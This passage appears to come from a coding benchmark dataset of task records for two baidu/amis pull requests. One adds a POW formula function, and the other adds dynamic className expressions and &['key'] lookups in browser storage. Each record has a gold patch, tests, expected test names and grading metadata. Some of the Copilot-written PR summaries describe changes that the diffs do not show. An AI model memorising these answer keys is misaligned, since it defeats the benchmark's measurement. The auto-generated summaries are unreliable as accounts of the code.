"test_sample_without_replacement": null } }
79728ddad4ddfdad819d4ea6e152790ba2aa410e
2023-10-12 08:54:51
baidu__amis-8370
diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' - } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? 
undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index dc2df1cc6..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index 84b6d5824..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,21 +515,13 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - if (!curRendererSchema.popOverContainer) { - curRendererSchema.popOverContainer = window.document.body; - } } JSONPipeOut(curRendererSchema); // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { - return translateSchema( - curRendererSchema, - this.appCorpusData, - (item: any) => item.__reactFiber || item.__reactProp // 在nextjs 13中,window.document.body对象,有__reactFiber,__reactProp 两个子对象,递归遍历会导致死循环,因此过滤掉 - ); + return translateSchema(curRendererSchema, this.appCorpusData); } return curRendererSchema; diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + 
## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..8e44dc051 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) {
feat: 表达式新增幂函数(Math.pow) ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 29bf446</samp> This pull request adds a new `POW` function to the amis-formula package, which allows users to calculate the power of a base value raised to an exponent. It also updates the unit tests, documentation, and type definitions to reflect the new function. The `POW` function depends on the `lodash` library for input validation. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 29bf446</samp> > _Raise your base to the power of doom_ > _With the `POW` function you can consume_ > _The formula evaluator is your tool_ > _But beware of the `lodash` rule_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 29bf446</samp> * Implement and document the `POW` function for calculating the power of a base number raised to an exponent ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R271-R281), [link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R469-R491), [link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999)) * Import the `isNumber` function from `lodash` to check the input parameters in `evalutor.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R16)) * Use the `Math.pow` method to calculate the power and handle invalid inputs in `evalutor.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999)) * Add a JSDoc comment for the `POW` function in `evalutor.ts` 
([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999)) * Add a documentation section for the `POW` function in `doc.md` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R271-R281)) * Add a documentation object for the `POW` function in `doc.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R469-R491)) * Add a unit test for the `POW` function in `evalute.test.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dR542-R564)) * Cover various cases of valid and invalid inputs and outputs for the `POW` function ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dR542-R564))
**Title** Add exponentiation support and correct CRUD/store handling **Problem** - Formulas had no built‑in way to compute a power, limiting mathematical expressions. - The CRUD example and its underlying store lost query information and could sync stale data, leading to incorrect API calls. - Schema translation in the formula editor could trigger infinite recursion in certain runtime environments. **Root Cause** - The evaluator lacked a POW implementation and proper numeric validation. - Store merging omitted the current query and the HOC passed the wrong data reference. - The editor added a pop‑over container that conflicted with React internals, causing recursion during translation. **Fix / Expected Behavior** - Provide a POW function that returns `baseⁿ`, validates inputs, and returns the base or NaN on invalid data. - Document the new function and update type definitions accordingly. - Enable the CRUD example to send a selectable mode parameter and expose an inline search toolbar. - Synchronize the CRUD store using the latest data prop and retain query parameters when rebuilding state. - Remove the problematic pop‑over container handling and simplify schema translation to avoid recursive traversal. **Risk & Validation** - Verify that existing formulas continue to evaluate correctly after adding POW. - Test CRUD list interactions, ensuring mode selection and search trigger the expected API requests with proper query data. - Run the editor’s translation flow in environments with Next.js to confirm the recursion issue is resolved.
8,370
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +})
[ "evalute:Math" ]
[ "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnPOW(base: number, exponent: number) Location: packages/amis-formula/src/evalutor.ts Inputs: - **base** – `number` | any – the base value; if the value is not a number the function returns it unchanged. - **exponent** – `number` | any – the exponent; if the value is not a number the function returns the base unchanged. Outputs: `number` – result of `Math.pow(base, exponent)`. Returns the original **base** when either argument is non‑numeric; if the mathematical result is not a valid number (e.g., negative base with fractional exponent) it yields `NaN`. Description: Provides the `POW` formula function used in `${POW(... )}` expressions to compute exponentiation. Handles input validation via `lodash/isNumber` and forwards to `Math.pow`, returning the base for invalid inputs and `NaN` for invalid results.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 7, "num_modified_lines": 100, "pr_author": "lurunze1226", "pr_labels": [ "feat" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R271-R281", "https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R469-R491", "https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a POW function to the formula evaluator with clear behavior (valid numbers compute Math.pow, invalid inputs return base or NaN) and provides unit tests that verify these cases. The tests directly assert the described behavior and do not introduce unrelated expectations. 
There are no signals of missing names, external info, ambiguous specs, or hidden knowledge, so the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6f599d5d939201ad5b809001425b333b87c6ec12
2023-10-13 09:45:51
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8385
diff --git a/docs/zh-CN/types/classname.md b/docs/zh-CN/types/classname.md index fbfa53d12..049ac855c 100644 --- a/docs/zh-CN/types/classname.md +++ b/docs/zh-CN/types/classname.md @@ -12,7 +12,9 @@ amis 中大部分的组件都支持配置 className 和 xxxClassName,他可以 配置方式有两种: 1. 直接配置字符串如:`className: "text-danger"` 文字标红。 -2. 采用对象配置,这个用法主要是方便写表达式如:`className: {"text-danger": "this.status == 1"}` 表示当数据 status 状态是 1 时,文字飘红。 +2. 采用对象配置,这个用法主要是方便写表达式如:`className: {"text-danger": "${status == 1}"}` 表示当数据 status 状态是 1 时,文字飘红。 + +> 注意 3.5 版本开始类名中支持表达式如: `text-${status == 1 ? 'danger' : 'success'}` ```schema { @@ -46,8 +48,9 @@ amis 中大部分的组件都支持配置 className 和 xxxClassName,他可以 "2": "在线" }, "className": { - "text-muted": "this.status == '1'", - "text-success": "this.status == '2'" + "text-muted": "${status == 1}", + "text-success": "${status == 2}", + "text-${status}": true } } ] diff --git a/packages/amis-core/src/utils/filter-schema.ts b/packages/amis-core/src/utils/filter-schema.ts index 752e61c49..0e9203b22 100644 --- a/packages/amis-core/src/utils/filter-schema.ts +++ b/packages/amis-core/src/utils/filter-schema.ts @@ -3,6 +3,7 @@ import {PlainObject} from '../types'; import {injectPropsToObject, mapObject} from './helper'; import isPlainObject from 'lodash/isPlainObject'; import cx from 'classnames'; +import {tokenize} from './tokenize'; /** * 处理 Props 数据,所有带 On 结束的做一次 @@ -29,17 +30,18 @@ export function getExprProperties( } let parts = /^(.*)(On|Expr|(?:c|C)lassName)(Raw)?$/.exec(key); + const type = parts?.[2]; let value: any = schema[key]; if ( value && typeof value === 'string' && parts?.[1] && - (parts[2] === 'On' || parts[2] === 'Expr') + (type === 'On' || type === 'Expr') ) { key = parts[1]; - if (parts[2] === 'On' || parts[2] === 'Expr') { + if (type === 'On' || type === 'Expr') { if ( !ctx && props && @@ -51,7 +53,7 @@ export function getExprProperties( }); } - if (parts[2] === 'On') { + if (type === 'On') { value = props?.[key] || evalExpression(value, ctx || data); } else { value = 
filter(value, ctx || data); @@ -60,17 +62,22 @@ export function getExprProperties( exprProps[key] = value; } else if ( + (type === 'className' || type === 'ClassName') && + !props?.[key] && // 如果 props 里面有则是 props 优先 value && - isPlainObject(value) && - (parts?.[2] === 'className' || parts?.[2] === 'ClassName') + (typeof value === 'string' || isPlainObject(value)) ) { - key = parts[1] + parts[2]; exprProps[`${key}Raw`] = value; - exprProps[key] = cx( - mapObject(value, (value: any) => - typeof value === 'string' ? evalExpression(value, data) : value - ) - ); + exprProps[key] = + typeof value === 'string' + ? tokenize(value, data) + : mapObject( + value, + (value: any) => + typeof value === 'string' ? evalExpression(value, data) : value, + undefined, + (key: string) => tokenize(key, data) + ); } }); diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index 71ddc701d..ff3ee484b 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -1566,8 +1566,9 @@ export function chainEvents(props: any, schema: any) { export function mapObject( value: any, - fn: Function, - skipFn?: (value: any) => boolean + valueMapper: (value: any) => any, + skipFn?: (value: any) => boolean, + keyMapper?: (key: string) => string ): any { // 如果value值满足skipFn条件则不做map操作 skipFn = @@ -1582,26 +1583,29 @@ export function mapObject( return false; }; - if (!!skipFn(value)) { + if (skipFn(value)) { return value; } if (Array.isArray(value)) { - return value.map(item => mapObject(item, fn, skipFn)); + return value.map(item => mapObject(item, valueMapper, skipFn, keyMapper)); } if (isObject(value)) { - let tmpValue = {...value}; - Object.keys(tmpValue).forEach(key => { - (tmpValue as PlainObject)[key] = mapObject( - (tmpValue as PlainObject)[key], - fn, - skipFn + let tmpValue = {}; + Object.keys(value).forEach(key => { + const newKey = keyMapper ? 
keyMapper(key) : key; + + (tmpValue as PlainObject)[newKey] = mapObject( + (value as PlainObject)[key], + valueMapper, + skipFn, + keyMapper ); }); return tmpValue; } - return fn(value); + return valueMapper(value); } export function loadScript(src: string) { diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 6f85541d1..92cdc2f67 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -366,17 +366,65 @@ export class Evaluator { return ast.value; } + /** + * 名字空间下获取变量,可能存在变量名中带-的特殊情况,目前无法直接获取 ${ns:xxx-xxx} + * 想借助 ${ns:&['xxx-xxx']} 用法来支持特殊字符。 + * + * 而 cookie, localstorage, sessionstorage 都不支持获取全量数据,如 ${ns: &} + * 所以当存在上述用法时,将 & 作为一个占位 + * + * 比如 cookie 中有一个 key 为 xxx-xxx 的值,那么可以通过 &['xxx-xxx'] 来获取。 + * 而无法通过 ${cookie:xxx-xxx} 来获取。 因为这样会被认为是减操作 + * @param ast + * @returns + */ + convertHostGetterToVariable(ast: any) { + if (ast.type !== 'getter') { + return ast; + } + + let gettter = ast; + const keys: Array<string> = []; + while (gettter.host?.type === 'getter') { + keys.push('host'); + gettter = gettter.host; + } + if (gettter.host?.type === 'variable' && gettter.host.name === '&') { + const ret: any = { + host: ast + }; + const host = keys.reduce((host, key) => { + host[key] = {...host[key]}; + return host[key]; + }, ret); + + host.host = { + start: host.host.start, + end: host.host.end, + type: 'variable', + name: this.evalute(host.host.key) + }; + return ret.host; + } + return ast; + } + nsVariable(ast: {namespace: string; body: any}) { + let body = ast.body; if (ast.namespace === 'window') { this.contextStack.push((name: string) => name === '&' ? 
window : (window as any)[name] ); } else if (ast.namespace === 'cookie') { + // 可能会利用 &['xxx-xxx'] 来取需要特殊变量 + body = this.convertHostGetterToVariable(body); this.contextStack.push((name: string) => { return getCookie(name); }); } else if (ast.namespace === 'ls' || ast.namespace === 'ss') { const ns = ast.namespace; + // 可能会利用 &['xxx-xxx'] 来取需要特殊变量 + body = this.convertHostGetterToVariable(body); this.contextStack.push((name: string) => { const raw = ns === 'ss' @@ -400,8 +448,10 @@ export class Evaluator { throw new Error('Unsupported namespace: ' + ast.namespace); } - const result = this.evalute(ast.body); - this.contextStack.pop(); + const result = this.evalute(body); + result?.then + ? result.then(() => this.contextStack.pop()) + : this.contextStack.pop(); return result; } diff --git a/packages/amis-ui/package.json b/packages/amis-ui/package.json index 5e0e14f9d..c886f905b 100644 --- a/packages/amis-ui/package.json +++ b/packages/amis-ui/package.json @@ -36,8 +36,8 @@ }, "dependencies": { "@rc-component/mini-decimal": "^1.0.1", - "amis-core": "^3.4.2", - "amis-formula": "^3.4.2", + "amis-core": "*", + "amis-formula": "*", "classnames": "2.3.2", "codemirror": "^5.63.0", "downshift": "6.1.12", diff --git a/packages/amis/package.json b/packages/amis/package.json index 1046c70ee..a72d7d2de 100644 --- a/packages/amis/package.json +++ b/packages/amis/package.json @@ -37,8 +37,8 @@ } ], "dependencies": { - "amis-core": "^3.4.2", - "amis-ui": "^3.4.2", + "amis-core": "*", + "amis-ui": "*", "attr-accept": "2.2.2", "blueimp-canvastoblob": "2.1.0", "classnames": "2.3.2",
feat: formula 取 cookie, localstorage, sessionstorage支持 &['xxx'] 来获取复杂变量名数据 Close: #8376 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 1b4c5a7</samp> This pull request updates the amis, amis-core, amis-ui, and amis-formula packages to version `3.4.2`, which includes bug fixes and new features for the amis framework. It also improves the testing and formatting of the amis-formula package, adds a new method to handle local storage values with hyphens, and enables Lerna to use Yarn workspaces. Additionally, it removes the amis-editor packages from the monorepo, as they have been moved to a separate repository. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 1b4c5a7</samp> > _We are the masters of the monorepo_ > _We use `lerna` and `yarn` to control the flow_ > _We fix the bugs and add the features_ > _We test the formulas and update the versions_ ### Why Close: #8376 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 1b4c5a7</samp> * Enable Lerna to use Yarn workspaces and update version of amis packages to 3.4.2 ([link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2d72bdead8afa0798d18995311992d684348a694c2d5e214e8e4d2b6153e4821L8-R9), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-7ae45ad102eab3b6d7e7896acd08c427a9b25b346470d7bc6507b6481575d519L7-R7), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL3-R3), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL49-R49), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2a1582dd8536cd65b762f9cd79719e90b98bdc38b808db0aaf783039f53d4153L3-R3), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL6-R6), 
[link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL39-R40), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L3-R3), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L40-R41)) * Add support for accessing local storage values using the `ls` namespace in `amis-formula` expressions ([link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-420dc4637078b9360fdc9b60177e5b57b5fd9bde9e43e2aeaf4e6521834043c2R590-R619), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL549-R551), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL564-R582), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L369-R413), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R419-R420), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R426-R427), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L403-R454)) * Fix formatting issue in `evalute.test.ts` ([link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL549-R551))
**Title** Enable dynamic class name expressions and support special‑character keys in cookie/localStorage/sessionStorage namespaces **Problem** - `className` objects could only contain static values; expression strings and dynamic keys were not evaluated, limiting UI styling flexibility. - Variables whose names contain characters such as `-` could not be accessed from cookie, localStorage, or sessionStorage, preventing use of realistic key names. **Root Cause** - The schema filtering logic treated class name objects as plain data and did not apply expression parsing or key tokenisation. - The expression evaluator lacked a mechanism to reference special‑character keys via a placeholder syntax, and the utility for object mapping could not transform object keys during traversal. **Fix / Expected Behavior** - Extend schema processing to evaluate class name objects, applying expression parsing to values and tokenising both values and keys (e.g., `text-${status}` or conditional classes). - Introduce support for a placeholder syntax (`&['key']`) that allows cookie, localStorage, and sessionStorage lookups of keys containing hyphens or other non‑identifier characters. - Enhance the generic object‑mapping helper to accept an optional key‑mapping function, enabling key tokenisation without altering existing behaviour. - Update documentation to illustrate the new class name expression capabilities and the placeholder syntax for storage namespaces. - Align internal package references to use workspace links rather than fixed version numbers. **Risk & Validation** - Changing the object‑mapping helper may affect other utilities; run the full test suite to confirm no regressions. - Verify that dynamic class name generation produces the correct class strings across all components. - Add unit tests for storage namespace lookups using the `&['key']` syntax and ensure they work for cookie, localStorage, and sessionStorage.
8,385
baidu/amis
diff --git a/packages/amis-formula/__tests__/async-evalute.test.ts b/packages/amis-formula/__tests__/async-evalute.test.ts index 18bcdf6a6..bd0e6fc1c 100644 --- a/packages/amis-formula/__tests__/async-evalute.test.ts +++ b/packages/amis-formula/__tests__/async-evalute.test.ts @@ -587,3 +587,33 @@ test('evalute:ISTYPE', async () => { ); expect(await evaluateForAsync('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('async-evalute:namespace', async () => { + localStorage.setItem('a', '1'); + localStorage.setItem('b', '2'); + localStorage.setItem('c', '{"a": 1, "b": 2, "c": {"d": 4}}'); + localStorage.setItem('key', 'c'); + localStorage.setItem('spec-var-name', 'you are right'); + + expect(await evaluateForAsync('${ls: a}', {})).toBe(1); + expect(await evaluateForAsync('${ls: b}', {})).toBe(2); + expect(await evaluateForAsync('${ls: c}', {})).toMatchObject({ + a: 1, + b: 2, + c: {d: 4} + }); + // 被认为是减操作 + expect(await evaluateForAsync('${ls: spec-var-name}', {})).toBe(0); + expect(await evaluateForAsync('${ls: spec\\-var\\-name}', {})).toBe( + 'you are right' + ); + expect(await evaluateForAsync('${ls: &["spec-var-name"]}', {})).toBe( + 'you are right' + ); + expect(await evaluateForAsync('${ls: &["c"]["c"]}', {})).toMatchObject({ + d: 4 + }); + expect(await evaluateForAsync('${ls: &["c"][key]}', {})).toMatchObject({ + d: 4 + }); +}); diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 2fb97d99a..fb30171c4 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -546,9 +546,9 @@ test('evalute:Math', () => { integer1: 2, integer2: 4, negativeInteger: -2, - array: [1, 2 ,3], + array: [1, 2, 3], infinity: Infinity - } + }; expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); @@ -561,4 +561,22 @@ test('evalute:Math', () => { expect(evaluate('${POW(infinity, 2)}', 
